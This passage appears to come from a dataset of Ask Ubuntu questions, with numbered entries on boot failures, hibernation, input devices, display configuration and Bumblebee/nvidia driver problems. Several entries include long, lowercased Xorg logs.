33.714 ] ( ii ) no input driver specified , ignoring this device . [ 33.714 ] ( ii ) this device may have been added with another device file . [ 33.714 ] ( ii ) config/udev : adding input device hda nvidia line-out surround ( /dev/input/event11 ) [ 33.714 ] ( ii ) no input driver specified , ignoring this device . [ 33.714 ] ( ii ) this device may have been added with another device file . [ 33.714 ] ( ii ) config/udev : adding input device hda nvidia line-out front ( /dev/input/event12 ) [ 33.714 ] ( ii ) no input driver specified , ignoring this device . [ 33.714 ] ( ii ) this device may have been added with another device file . [ 33.714 ] ( ii ) config/udev : adding input device hda nvidia line ( /dev/input/event5 ) [ 33.714 ] ( ii ) no input driver specified , ignoring this device . [ 33.714 ] ( ii ) this device may have been added with another device file . [ 33.715 ] ( ii ) config/udev : adding input device hda nvidia front mic ( /dev/input/event6 ) [ 33.715 ] ( ii ) no input driver specified , ignoring this device . [ 33.715 ] ( ii ) this device may have been added with another device file . [ 33.715 ] ( ii ) config/udev : adding input device hda nvidia rear mic ( /dev/input/event7 ) [ 33.715 ] ( ii ) no input driver specified , ignoring this device . [ 33.715 ] ( ii ) this device may have been added with another device file . [ 33.715 ] ( ii ) config/udev : adding input device hda nvidia front headphone ( /dev/input/event8 ) [ 33.715 ] ( ii ) no input driver specified , ignoring this device . [ 33.715 ] ( ii ) this device may have been added with another device file . [ 33.715 ] ( ii ) config/udev : adding input device hda nvidia line-out side ( /dev/input/event9 ) [ 33.715 ] ( ii ) no input driver specified , ignoring this device . [ 33.715 ] ( ii ) this device may have been added with another device file . [ 35.562 ] ( ii ) nvidia ( gpu-0 ) : display ( lg electronics w2252 ( crt-0 ) ) does not support nvidia [ 35.562 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 35.562 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 35.562 ] ( ** ) nvidia ( 0 ) : device lg electronics w2252 ( crt-0 ) ( using edid [ 35.563 ] ( ** ) nvidia ( 0 ) : frequencies has been enabled on all display devices . ) [ 37.048 ] ( ii ) nvidia ( gpu-0 ) : display ( lg electronics w2252 ( crt-0 ) ) does not support nvidia [ 37.048 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 37.048 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 37.048 ] ( ** ) nvidia ( 0 ) : device lg electronics w2252 ( crt-0 ) ( using edid [ 37.048 ] ( ** ) nvidia ( 0 ) : frequencies has been enabled on all display devices . ) [ 39.360 ] ( ii ) nvidia ( gpu-0 ) : display ( lg electronics w2252 ( crt-0 ) ) does not support nvidia [ 39.360 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 39.360 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 39.360 ] ( ** ) nvidia ( 0 ) : device lg electronics w2252 ( crt-0 ) ( using edid [ 39.360 ] ( ** ) nvidia ( 0 ) : frequencies has been enabled on all display devices . ) [ 41.680 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-03af3717ff3ab439a4baaba686ccb40771cdf520.xkm [ 47.673 ] ( ii ) config/udev : adding input device logitech unifying device . wireless pid:101b ( /dev/input/event13 ) [ 47.673 ] ( ** ) logitech unifying device . wireless pid:101b : applying inputclass `` evdev pointer catchall '' [ 47.673 ] ( ii ) using input driver 'evdev ' for 'logitech unifying device . wireless pid:101b' [ 47.673 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 47.673 ] ( ** ) logitech unifying device . wireless pid:101b : always reports core events ... truncated ... emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 47.673 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:04.0/usb4/4-5/4-5:1.2/0003:046d : c52b.0006/input/input13/event13 '' [ 47.673 ] ( ii ) xinput : adding extended input device `` logitech unifying device . wireless pid:101b '' ( type : mouse , id 11 ) [ 47.673 ] ( ii ) evdev : logitech unifying device . wireless pid:101b : initialized for relative axes . [ truncated [ 47.674 ] ( ii ) config/udev : adding input device logitech unifying device . wireless pid:101b ( /dev/input/mouse1 ) [ 47.674 ] ( ii ) no input driver specified , ignoring this device . [ 47.674 ] ( ii ) this device may have been added with another device file . [ 56.904 ] ( ii ) nvidia ( gpu-0 ) : display ( lg electronics w2252 ( crt-0 ) ) does not support nvidia [ 56.904 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 56.904 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 56.904 ] ( ** ) nvidia ( 0 ) : device lg electronics w2252 ( crt-0 ) ( using edid [ 56.904 ] ( ** ) nvidia ( 0 ) : frequencies has been enabled on all display devices . ) i had to truncate some bits as it 's 35000 chars ! they are denoted [ ... ( info type ) ...
388891	ubuntu 13.04 experienced internal error , mouse wont work .	so my hp pavilion 14-b120dx sleekbook running ubuntu 13.04 has experienced an internal error . mouse no longer works , its offline . i am trying to install windows on the pc and my usb dvd drive on startup does n't give me the `` press any key to boot from cd '' it boots straight to ubuntu . usb cd drive is at the top uefi boot order .
388899	xubuntu - endless hibernation process	recently i switched from gentoo to xubuntu . with gentoo , hibernating worked just fine , but when i try to hibernate with xubuntu ( 13.10 ) , computer shows black screen and even power led icon starts blinking ( this is how my computer behaves during hibernation ) - so i guess , everything is fine until now . however , computer never shuts down - this `` hibernation state '' lasts for more than 5 minutes and then i have to perform manual shutdown . when i start the computer once again , xubuntu behaves like hibernation was performed correctly ( my working state is persisted ) . so i guess , my only problem is that hibernation seems never to end - and this is really annoying ... btw swap size is ok , since with gentoo hibernation worked also dmesg logs look fine ( there are logs for creating hibernation file , restoring hibernation state , etc ... ) could you help me ? thanks
388902	ubuntu 12.04 upgrade was interrupted . the system does not boot . how to restore any previous version ?	the computer turned off in the middle of installing new packages . turning on the computer gets me to grub loader which lists all previously installed ubuntu versions , but none of them loads . the screen writes : unable to mount filesystems . what should i do to restore any version ?
388903	mce remote control - lirc reponds - now what ?	my hauppauge mce remote now works with ubuntu 13.10 . however , when i try to use something like vlc media player , nothing happens ( e.g . the video does not pause when i press the pause button ) . i have verified that the correct command is being echoed when i press the corresponding button . ( except chanup and chandown seem to be reversed , but not a problem ) . any ideas what my next steps are in dumping windows forever ? /home/buck > $ irw 000000037ff05bef 00 volup mceusb_hauppauge 000000037ff05bef 01 volup mceusb_hauppauge 000000037ff05bec 00 chanup mceusb_hauppauge 000000037ff05bec 01 chanup mceusb_hauppauge 000000037ff05be7 00 pause mceusb_hauppauge 000000037ff05be7 01 pause mceusb_hauppauge 000000037ff05be9 00 play mceusb_hauppauge 000000037ff05be9 01 play mceusb_hauppauge 000000037ff05be7 00 pause mceusb_hauppauge 000000037ff05be7 01 pause mceusb_hauppauge 000000037ff05be7 00 pause mceusb_hauppauge 000000037ff05be7 01 pause mceusb_hauppauge 000000037ff05be7 00 pause mceusb_hauppauge 000000037ff05be7 01 pause mceusb_hauppauge 000000037ff05be7 00 pause mceusb_hauppauge 000000037ff05be7 01 pause mceusb_hauppauge 000000037ff05be7 00 pause mceusb_hauppauge 000000037ff05be7 01 pause mceusb_hauppauge
388906	system not booting any os ; error : unknown file system . grub rescue >	i already installed windows 7 in my laptop . then , i installed ubuntu 12.10 version alongside dual boot with windows . but , when i login into ubuntu os , it shows error like below : system running in low config mode . so , i started resolving that issue . but it worse . after solving the previous issue , again i got an error like below : error : no such partition.grub rescue > then , i tried to repair ubuntu os through usb flash drive . it works , but after few times , i got an error like below : error ; unknown file system . grub rescue > again , i tried to install a fresh copy of ubuntu os using usb flash drive . but , it does n't boot even windows os . my system is totally crashed . i tried many ways by googling , how can i resolve this ? ( note : i do n't have cd/dvd drive in my laptop )
388907	ubuntu on mkt phones	hi i am one of lovers ubuntu and the work you have done on ubuntu phone is amazing . i want to develop ubuntu on mtk processors phone . it is the most grow market that you can do ammazing thinks and everyone can have the cheap ubuntu phone . thanks a lot to give me the oportunity to give ideas for amazing thinks ubuntu
388910	how to set permissions for /ttyusbn and /ttyacmn	i want to have a number of ttyusb devices ( e.g . ftdi cables ) as well as ttyacm connections default to my user so i do n't have to use sudo or go in and change permissions each time . they all default to root : root . a friend has 12.04 lts running in vm on a mac and his defaults to dialout and the usual method of adding the user to the dialout group works for him . i 've loaded three machines with 12.04 lts , two of them in last three days and all machines default the usb devices to root : root . i tried a suggestion that added a file in /etc/udev/rules.d ( since deleted ) that did n't work .
388913	how to make ps1 display full path name	using ubuntu 12.04.3 , i 've modified my ps1 to [ \u @ \h ] \w $ which should display as follows : [ user @ host /home/user ] $ but it doesn't it 's still [ user @ host ~ ] $ this used to work . what changed ?
388919	xmodmap , map capslock to control_l , contol to super_l	i usually swap control and capslock , but the old laptop i am using has no win key which i use as a super key . so that is why i would like to have to assign control_l to caplock but control to super_l
388920	how to change monitor number ?	i recently installed xmonad on ubuntu 12.04.3 precise pangolin and the default keybindings are mod-w to switch to monitor 0 and mod-e to switch to monitor 1 . unfortunately my monitors are positioned in the opposite order on my desk , with the left monitor being 1 and the middle monitor being 0 . changing cables wo n't work since the left monitor will not preserve its maximum resolution of 1920x1200 on vga ( i only have 1 hdmi port and it 's using it ) , even though i tried to install that new mode several times with xrandr -- addmode etc . while i could technically physically swap the position of the monitors on my desk , or swap the xmonad keybindings , i 'd love to know if there 's a way to swap monitor numbers within x to achieve a similar effect . i have n't managed to find anything on google , so i 'm hoping folks here might know . thank you !
388921	recent problem with bumblebee ( 13.04 ) msi ge60	i 'm on 13.4 , optirun was working few days ago , and no more now . uname -a linux bobby-oc 3.11.10-031110-generic # 201311291453 smp fri nov 29 19:54:20 utc 2013 x86_64 x86_64 x86_64 gnu/linux pspci intel and nvidia weel seens lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gtx 660m ] ( rev ff ) i 've remove everything sudo apt-get purge bumblebee* nvidia* and reinstall sudo apt-get install bumblebee bumblebee-nvidia from ppa bumblebee-stable . i would like to use last nividia driver available , so i add ppa xorg-edgers and install sudo apt-get install nvidia-331 nvidia-331-settings dpkg -l | grep nvidia ii bumblebee-nvidia 3.2.1-1~raringppa5 amd64 nvidia optimus support using the proprietary nvidia driver rc nvidia-304 304.116-0ubuntu1~xedgers~raring1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-331 331.20-0ubuntu1~xedgers~raring1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-persistenced 331.20-0ubuntu1~xedgers~raring1 amd64 load the nvidia kernel driver and create device files rc nvidia-settings-304 304.116-0ubuntu1~xedgers~raring1 amd64 tool for configuring the nvidia graphics driver ii nvidia-settings-331 331.20-0ubuntu1~xedgers~raring1 amd64 tool for configuring the nvidia graphics driver dpkg -l | grep bumblebee ii bumblebee 3.2.1-1~raringppa5 amd64 nvidia optimus support ii bumblebee-nvidia 3.2.1-1~raringppa5 amd64 nvidia optimus support using the proprietary nvidia driver conf bumblebee.conf [ bumblebeed ] driver=nvidia [ optirun ] bridge=primus [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-331 pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-331 : /usr/lib32/nvidia-331 # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia into /etc/bumblebee/xorg.conf.nvidia i 've put busid `` pci:01:00.0 '' as i was done into lscpi optirun glxgears [ 1771.606818 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 1771.606869 ] [ error ] aborting because fallback start is disabled . log from xorg.8.log [ 1944.244 ] x protocol version 11 , revision 0 [ 1944.244 ] build operating system : linux 2.6.24-32-xen x86_64 ubuntu [ 1944.244 ] current operating system : linux bobby-oc 3.10.20-031020-generic # 201311201536 smp wed nov 20 20:37:08 utc 2013 x86_64 [ 1944.244 ] kernel command line : boot_image=/boot/vmlinuz-3.10.20-031020-generic root=uuid=16ade6ea-ffd3-4e44-ac67-09776283b5c4 ro quiet splash vt.handoff=7 [ 1944.244 ] build date : 08 may 2013 02:34:03pm [ 1944.244 ] xorg-server 2:1.13.4~git20130508+server-1.13-branch.10c42f57-0ubuntu0ricotz~raring ( for technical support please see http : //www.ubuntu.com/support ) [ 1944.244 ] current version of pixman : 0.28.2 [ 1944.244 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 1944.244 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 1944.244 ] ( == ) log file : `` /var/log/xorg.8.log '' , time : tue dec 10 14:27:10 2013 [ 1944.244 ] ( ++ ) using config file : `` /etc/bumblebee/xorg.conf.nvidia '' [ 1944.244 ] ( ++ ) using config directory : `` /etc/bumblebee/xorg.conf.d '' [ 1944.244 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 1944.244 ] ( == ) serverlayout `` layout0 '' [ 1944.244 ] ( == ) no screen section available . using defaults . [ 1944.244 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 1944.244 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 1944.244 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 1944.244 ] ( ** ) | | -- > device `` discretenvidia '' [ 1944.244 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 1944.244 ] ( ** ) option `` autoadddevices '' `` false '' [ 1944.245 ] ( ** ) option `` autoaddgpu '' `` false '' [ 1944.245 ] ( ** ) not automatically adding devices [ 1944.245 ] ( == ) automatically enabling devices [ 1944.245 ] ( ** ) not automatically adding gpu devices [ 1944.245 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 1944.245 ] entry deleted from font path . [ 1944.245 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 1944.245 ] entry deleted from font path . [ 1944.245 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 1944.245 ] entry deleted from font path . [ 1944.245 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 1944.245 ] entry deleted from font path . [ 1944.245 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 1944.245 ] entry deleted from font path . [ 1944.245 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 1944.245 ] entry deleted from font path . [ 1944.245 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 1944.245 ] ( ++ ) modulepath set to `` /usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules '' [ 1944.245 ] ( == ) | -- > input device `` < default pointer > '' [ 1944.245 ] ( == ) | -- > input device `` < default keyboard > '' [ 1944.245 ] ( == ) the core pointer device was n't specified explicitly in the layout . using the default mouse configuration . [ 1944.245 ] ( == ) the core keyboard device was n't specified explicitly in the layout . using the default keyboard configuration . [ 1944.245 ] ( ii ) loader magic : 0x7fdf88004d20 [ 1944.245 ] ( ii ) module abi versions : [ 1944.245 ] x.org ansi c emulation : 0.4 [ 1944.245 ] x.org video driver : 13.1 [ 1944.245 ] x.org xinput driver : 18.0 [ 1944.245 ] x.org server extension : 7.0 [ 1944.245 ] ( ii ) config/udev : adding drm device ( /dev/dri/card1 ) [ 1944.245 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 1944.247 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0fd4:1462:10d7 rev 161 , mem @ 0xf5000000/16777216 , 0xe0000000/268435456 , 0xf0000000/33554432 , i/o @ 0x0000e000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 1944.247 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 1944.247 ] initializing built-in extension generic event extension [ 1944.247 ] initializing built-in extension shape [ 1944.247 ] initializing built-in extension mit-shm [ 1944.247 ] initializing built-in extension xinputextension [ 1944.247 ] initializing built-in extension xtest [ 1944.247 ] initializing built-in extension big-requests [ 1944.247 ] initializing built-in extension sync [ 1944.247 ] initializing built-in extension xkeyboard [ 1944.247 ] initializing built-in extension xc-misc [ 1944.247 ] initializing built-in extension security [ 1944.247 ] initializing built-in extension xinerama [ 1944.247 ] initializing built-in extension xfixes [ 1944.247 ] initializing built-in extension render [ 1944.247 ] initializing built-in extension randr [ 1944.247 ] initializing built-in extension composite [ 1944.247 ] initializing built-in extension damage [ 1944.247 ] initializing built-in extension mit-screen-saver [ 1944.247 ] initializing built-in extension double-buffer [ 1944.247 ] initializing built-in extension record [ 1944.247 ] initializing built-in extension dpms [ 1944.247 ] initializing built-in extension x-resource [ 1944.247 ] initializing built-in extension xvideo [ 1944.247 ] initializing built-in extension xvideo-motioncompensation [ 1944.247 ] initializing built-in extension selinux [ 1944.247 ] initializing built-in extension xfree86-vidmodeextension [ 1944.247 ] initializing built-in extension xfree86-dga [ 1944.247 ] initializing built-in extension xfree86-dri [ 1944.247 ] initializing built-in extension dri2 [ 1944.247 ] ( ii ) loadmodule : `` glx '' [ 1944.247 ] ( ii ) loading /usr/lib/nvidia-331/xorg/libglx.so [ 1944.259 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 1944.259 ] compiled for 4.0.2 , module version = 1.0.0 [ 1944.259 ] module class : x.org server extension [ 1944.259 ] ( ii ) nvidia glx module 331.20 wed oct 30 17:36:48 pdt 2013 [ 1944.259 ] loading extension glx [ 1944.259 ] ( ii ) loadmodule : `` nvidia '' [ 1944.259 ] ( ii ) loading /usr/lib/nvidia-331/xorg/nvidia_drv.so [ 1944.260 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 1944.260 ] compiled for 4.0.2 , module version = 1.0.0 [ 1944.260 ] module class : x.org video driver [ 1944.260 ] ( ii ) loadmodule : `` mouse '' [ 1944.260 ] ( ii ) loading /usr/lib/xorg/modules/input/mouse_drv.so [ 1944.260 ] ( ii ) module mouse : vendor= '' x.org foundation '' [ 1944.260 ] compiled for 1.13.0 , module version = 1.7.2 [ 1944.260 ] module class : x.org xinput driver [ 1944.260 ] abi class : x.org xinput driver , version 18.0 [ 1944.260 ] ( ii ) loadmodule : `` kbd '' [ 1944.260 ] ( ww ) warning , could n't open module kbd [ 1944.260 ] ( ii ) unloadmodule : `` kbd '' [ 1944.260 ] ( ii ) unloading kbd [ 1944.260 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 1944.260 ] ( ii ) nvidia dlloader x driver 331.20 wed oct 30 17:16:53 pdt 2013 [ 1944.260 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 1944.260 ] ( -- ) using vt number 7 [ 1944.260 ] ( ee ) no devices detected . [ 1944.261 ] ( == ) matched intel as autoconfigured driver 0 [ 1944.261 ] ( == ) matched nvidia as autoconfigured driver 1 [ 1944.261 ] ( == ) matched nouveau as autoconfigured driver 2 [ 1944.261 ] ( == ) matched intel as autoconfigured driver 3 [ 1944.261 ] ( == ) matched vesa as autoconfigured driver 4 [ 1944.261 ] ( == ) matched modesetting as autoconfigured driver 5 [ 1944.261 ] ( == ) matched fbdev as autoconfigured driver 6 [ 1944.261 ] ( == ) assigned the driver to the xf86configlayout [ 1944.261 ] ( ii ) loadmodule : `` intel '' [ 1944.261 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 1944.261 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 1944.261 ] compiled for 1.13.4 , module version = 2.99.906 [ 1944.261 ] module class : x.org video driver [ 1944.261 ] abi class : x.org video driver , version 13.1 [ 1944.261 ] ( ii ) loadmodule : `` nvidia '' [ 1944.261 ] ( ii ) loading /usr/lib/nvidia-331/xorg/nvidia_drv.so [ 1944.261 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 1944.261 ] compiled for 4.0.2 , module version = 1.0.0 [ 1944.261 ] module class : x.org video driver [ 1944.261 ] ( ii ) unloadmodule : `` nvidia '' [ 1944.261 ] ( ii ) unloading nvidia [ 1944.261 ] ( ii ) failed to load module `` nvidia '' ( already loaded , 32735 ) [ 1944.261 ] ( ii ) loadmodule : `` nouveau '' [ 1944.261 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 1944.261 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 1944.261 ] compiled for 1.13.4 , module version = 1.0.9 [ 1944.261 ] module class : x.org video driver [ 1944.261 ] abi class : x.org video driver , version 13.1 [ 1944.261 ] ( ii ) loadmodule : `` vesa '' [ 1944.262 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 1944.262 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 1944.262 ] compiled for 1.12.99.902 , module version = 2.3.2 [ 1944.262 ] module class : x.org video driver [ 1944.262 ] abi class : x.org video driver , version 13.0 [ 1944.262 ] ( ii ) loadmodule : `` modesetting '' [ 1944.262 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 1944.262 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 1944.262 ] compiled for 1.13.3 , module version = 0.7.0 [ 1944.262 ] module class : x.org video driver [ 1944.262 ] abi class : x.org video driver , version 13.1 [ 1944.262 ] ( ii ) loadmodule : `` fbdev '' [ 1944.262 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 1944.262 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 1944.262 ] compiled for 1.12.99.902 , module version = 0.4.3 [ 1944.262 ] module class : x.org video driver [ 1944.262 ] abi class : x.org video driver , version 13.0 [ 1944.262 ] ( ii ) loadmodule : `` mouse '' [ 1944.262 ] ( ii ) loading /usr/lib/xorg/modules/input/mouse_drv.so [ 1944.262 ] ( ii ) module mouse : vendor= '' x.org foundation '' [ 1944.262 ] compiled for 1.13.0 , module version = 1.7.2 [ 1944.262 ] module class : x.org xinput driver [ 1944.262 ] abi class : x.org xinput driver , version 18.0 [ 1944.262 ] ( ii ) loadmodule : `` kbd '' [ 1944.263 ] ( ww ) warning , could n't open module kbd [ 1944.263 ] ( ii ) unloadmodule : `` kbd '' [ 1944.263 ] ( ii ) unloading kbd [ 1944.263 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 1944.263 ] ( ii ) nvidia dlloader x driver 331.20 wed oct 30 17:16:53 pdt 2013 [ 1944.263 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 1944.263 ] ( ii ) intel : driver for intel ( r ) integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , hd graphics , hd graphics 2000 , hd graphics 3000 , hd graphics 2500 , hd graphics 4000 , hd graphics p4000 , hd graphics 4600 , hd graphics 5000 , hd graphics p4600/p4700 , iris ( tm ) graphics 5100 , hd graphics 4400 , hd graphics 4200 , iris ( tm ) pro graphics 5200 [ 1944.263 ] ( ii ) nouveau driver [ 1944.263 ] ( ii ) nouveau driver for nvidia chipset families : [ 1944.263 ] riva tnt ( nv04 ) [ 1944.263 ] riva tnt2 ( nv05 ) [ 1944.263 ] geforce 256 ( nv10 ) [ 1944.263 ] geforce 2 ( nv11 , nv15 ) [ 1944.264 ] geforce 4mx ( nv17 , nv18 ) [ 1944.264 ] geforce 3 ( nv20 ) [ 1944.264 ] geforce 4ti ( nv25 , nv28 ) [ 1944.264 ] geforce fx ( nv3x ) [ 1944.264 ] geforce 6 ( nv4x ) [ 1944.264 ] geforce 7 ( g7x ) [ 1944.264 ] geforce 8 ( g8x ) [ 1944.264 ] geforce gtx 200 ( nva0 ) [ 1944.264 ] geforce gtx 400 ( nvc0 ) [ 1944.264 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 1944.264 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 1944.264 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 1944.264 ] ( ++ ) using vt number 7 [ 1944.264 ] ( ww ) xf86openconsole : setpgid failed : operation not permitted [ 1944.264 ] ( ww ) xf86openconsole : setsid failed : operation not permitted [ 1944.264 ] ( ww ) falling back to old probe method for vesa [ 1944.264 ] ( ww ) falling back to old probe method for modesetting [ 1944.264 ] ( ii ) modesetting ( 0 ) : using default device [ 1944.264 ] ( ww ) falling back to old probe method for fbdev [ 1944.264 ] ( ii ) loading sub module `` fbdevhw '' [ 1944.264 ] ( ii ) loadmodule : `` fbdevhw '' [ 1944.264 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 1944.264 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 1944.264 ] compiled for 1.13.4 , module version = 0.0.2 [ 1944.264 ] abi class : x.org video driver , version 13.1 [ 1944.264 ] ( ii ) fbdev ( 1 ) : using default device [ 1944.265 ] ( ii ) modesetting ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 1944.265 ] ( == ) modesetting ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 1944.265 ] ( == ) modesetting ( 0 ) : rgb weight 888 [ 1944.265 ] ( == ) modesetting ( 0 ) : default visual is truecolor [ 1944.265 ] ( ii ) modesetting ( 0 ) : shadowfb : preferred yes , enabled yes [ 1944.265 ] ( ii ) modesetting ( 0 ) : output lvds-0 has no monitor section [ 1944.266 ] ( ii ) modesetting ( 0 ) : output vga-0 has no monitor section [ 1944.266 ] ( ii ) modesetting ( 0 ) : output hdmi-0 has no monitor section [ 1944.266 ] ( ii ) modesetting ( 0 ) : output displayport-0 has no monitor section [ 1944.267 ] ( ii ) modesetting ( 0 ) : edid for output lvds-0 [ 1944.267 ] ( ii ) modesetting ( 0 ) : manufacturer : lgd model : 259 serial # : 0 [ 1944.267 ] ( ii ) modesetting ( 0 ) : year : 2009 week : 0 [ 1944.267 ] ( ii ) modesetting ( 0 ) : edid version : 1.3 [ 1944.267 ] ( ii ) modesetting ( 0 ) : digital display input [ 1944.267 ] ( ii ) modesetting ( 0 ) : max image size [ cm ] : horiz . : 35 vert . : 19 [ 1944.267 ] ( ii ) modesetting ( 0 ) : gamma : 2.20 [ 1944.267 ] ( ii ) modesetting ( 0 ) : no dpms capabilities specified [ 1944.267 ] ( ii ) modesetting ( 0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 1944.267 ] ( ii ) modesetting ( 0 ) : first detailed timing is preferred mode [ 1944.267 ] ( ii ) modesetting ( 0 ) : redx : 0.617 redy : 0.349 greenx : 0.313 greeny : 0.595 [ 1944.267 ] ( ii ) modesetting ( 0 ) : bluex : 0.15enter code here1 bluey : 0.056 whitex : 0.313 whitey : 0.329 [ 1944.267 ] ( ii ) modesetting ( 0 ) : manufacturer 's mask : 0 [ 1944.267 ] ( ii ) modesetting ( 0 ) : supported detailed timing : [ 1944.267 ] ( ii ) modesetting ( 0 ) : clock : 138.5 mhz image size : 345 x 194 mm [ 1944.267 ] ( ii ) modesetting ( 0 ) : h_active : 1920 h_sync : 1968 h_sync_end 2000 h_blank_end 2080 h_border : 0 [ 1944.267 ] ( ii ) modesetting ( 0 ) : v_active : 1080 v_sync : 1083 v_sync_end 1088 v_blanking : 1111 v_border : 0 [ 1944.267 ] ( ii ) modesetting ( 0 ) : lg display [ 1944.267 ] ( ii ) modesetting ( 0 ) : lp156wf1-tlf3 [ 1944.267 ] ( ii ) modesetting ( 0 ) : edid ( in hex ) : [ 1944.267 ] ( ii ) modesetting ( 0 ) : 00ffffffffffff0030e4590200000000 [ 1944.267 ] ( ii ) modesetting ( 0 ) : 00130103802313780a15d59e59509826 [ 1944.267 ] ( ii ) modesetting ( 0 ) : 0e505400000001010101010101010101 [ 1944.267 ] ( ii ) modesetting ( 0 ) : 0101010101011a3680a070381f403020 [ 1944.267 ] ( ii ) modesetting ( 0 ) : 350059c2100000190000000000000000 [ 1944.267 ] ( ii ) modesetting ( 0 ) : 00000000000000000000000000fe004c [ 1944.267 ] ( ii ) modesetting ( 0 ) : 4720446973706c61790a2020000000fe [ 1944.267 ] ( ii ) modesetting ( 0 ) : 004c503135365746312d544c4633003c [ 1944.267 ] ( ii ) modesetting ( 0 ) : printing probed modes for output lvds-0 [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1920x1080 '' x59.9 138.50 1920 1968 2000 2080 1080 1083 1088 1111 -hsync -vsync ( 66.6 khz ep ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1680x1050 '' x60.0 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync ( 65.3 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1680x1050 '' x59.9 119.00 1680 1728 1760 1840 1050 1053 1059 1080 +hsync -vsync ( 64.7 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1600x1024 '' x60.2 103.12 1600 1600 1656 1664 1024 1024 1029 1030 +hsync +vsync ( 62.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1400x1050 '' x60.0 122.00 1400 1488 1640 1880 1050 1052 1064 1082 +hsync +vsync ( 64.9 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync 